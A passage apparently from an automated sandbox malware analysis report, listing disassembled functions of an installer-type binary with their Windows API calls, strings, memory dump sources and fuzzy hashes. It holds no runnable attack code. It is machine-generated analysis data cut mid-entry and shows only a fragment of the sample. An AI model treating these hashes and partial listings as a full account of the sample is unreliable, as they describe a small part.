                                                                                                                                                                                                                                                                            • String ID: f
                                                                                                                                                                                                                                                                            • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                            • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                            • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                            Function 00406064 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                            • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                            • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                            • String ID: *?|<>/":
                                                                                                                                                                                                                                                                            • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                            • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                            • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                            Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                            • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                            • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                            Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                            • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                            • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                            • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                            Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                            • String ID: !
                                                                                                                                                                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                            • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                            • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                            Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                            • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                            • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                            • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                            Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                            • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                            • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                            • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                            • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                            Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                              • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                            • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                            • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                            • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                            • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                            Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                            • String ID: %02x%c$...
                                                                                                                                                                                                                                                                            • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                            • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                            • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                            Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                            • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                            • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                            • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                            • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                            • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                            Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                            • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                              • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000001C.00000002.2918135413.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918108312.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918167458.0000000000409000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000040C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000420000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.0000000000434000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918201192.000000000046B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000001C.00000002.2918344991.0000000000500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_28_2_400000_3dd71a48b2.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
